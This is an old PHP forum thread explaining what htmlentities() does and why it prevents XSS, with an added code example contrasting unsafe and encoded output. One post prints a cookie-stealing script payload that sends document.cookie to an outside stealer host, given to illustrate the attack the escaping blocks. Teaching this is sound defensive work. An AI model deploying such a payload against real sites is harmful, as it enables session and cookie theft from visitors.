
The HTML Entities Function

Posted: Wed Sep 14, 2005 2:29 pm
by pilau
Htmlentities... right.

Can somebody explain what it does actually?
Why do we need it? In what cases?

TIA

Posted: Wed Sep 14, 2005 2:32 pm
by josh
Turns anything that is a special HTML character into its entity. Entities are like HTML tags that cause HTML to be outputted "literally" to the browser, so that instead of <b>making text bold</b> you just want the bold HTML tag to output plainly to the screen. It's useful in posting examples of HTML source but is also a security necessity against XSS (allowing other users to 'inject' HTML into your page).

Posted: Fri Sep 16, 2005 12:03 pm
by pilau
Great, thanks mate.

Posted: Mon Sep 19, 2005 8:18 am
by Jenk
An example of HTML injection/XSS attack (Cookie stealing)


<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>
Now if these forums did not use htmlentities (or similar function) then http://www.cookiestealers.com would have the contents of the cookies from the viewers of this thread.

But because PHP's htmlentities() replaces '<' with '&lt;' and '>' with '&gt;' (less than and greater than respectively) the code becomes, as jshpro2 pointed out, literal.

There are other characters that are changed as well, " (double quote) for example.
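The point josh and Jenk are making, shown as an added example rather than code from either post: the same untrusted string is echoed once verbatim (the XSS-prone way) and once through htmlentities(). The $untrusted value is a constructed sample of what a forum user might submit; the function names render_unsafe, render_safe and input_field are this example's own.

```php
<?php
// Added example, not part of the original thread.
// $untrusted stands in for text a visitor typed into a post (constructed sample).
$untrusted = '<script>alert("xss")</script> & "quoted" text';

// Vulnerable pattern: user input is placed straight into the page, so the
// browser parses the <script> tag as markup and runs it.
function render_unsafe(string $input): string
{
    return '<p>' . $input . '</p>';
}

// Safe pattern: encode the HTML-significant characters (< > & " ') so the
// browser displays them literally instead of interpreting them.
// ENT_QUOTES also converts single quotes, which matters inside attributes;
// naming the charset avoids surprises with multibyte input.
function render_safe(string $input): string
{
    return '<p>' . htmlentities($input, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Attribute context: the value must be both quoted and encoded, otherwise a
// stray double quote would let the input break out of the attribute.
function input_field(string $name, string $value): string
{
    return '<input name="' . htmlentities($name, ENT_QUOTES, 'UTF-8')
         . '" value="' . htmlentities($value, ENT_QUOTES, 'UTF-8') . '">';
}

echo render_unsafe($untrusted), "\n";   // the script tag survives intact
echo render_safe($untrusted), "\n";     // every tag and quote is encoded
echo input_field('q', $untrusted), "\n";
```

In the safe output every `<` becomes `&lt;`, `>` becomes `&gt;`, `&` becomes `&amp;` and `"` becomes `&quot;`, so the browser shows the script tag as text exactly as Jenk describes. htmlspecialchars() with the same flags covers the same five characters and is the usual choice when the page is served as UTF-8; htmlentities() additionally converts characters such as accented letters to named entities. Whichever you use, encode at the moment of output, not when the post is stored, and pass ENT_QUOTES explicitly since older PHP releases did not encode single quotes by default.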

Posted: Mon Sep 19, 2005 9:11 am
by pilau
Cool. Thank you.

Posted: Tue Sep 20, 2005 7:56 am
by $var
that's fun.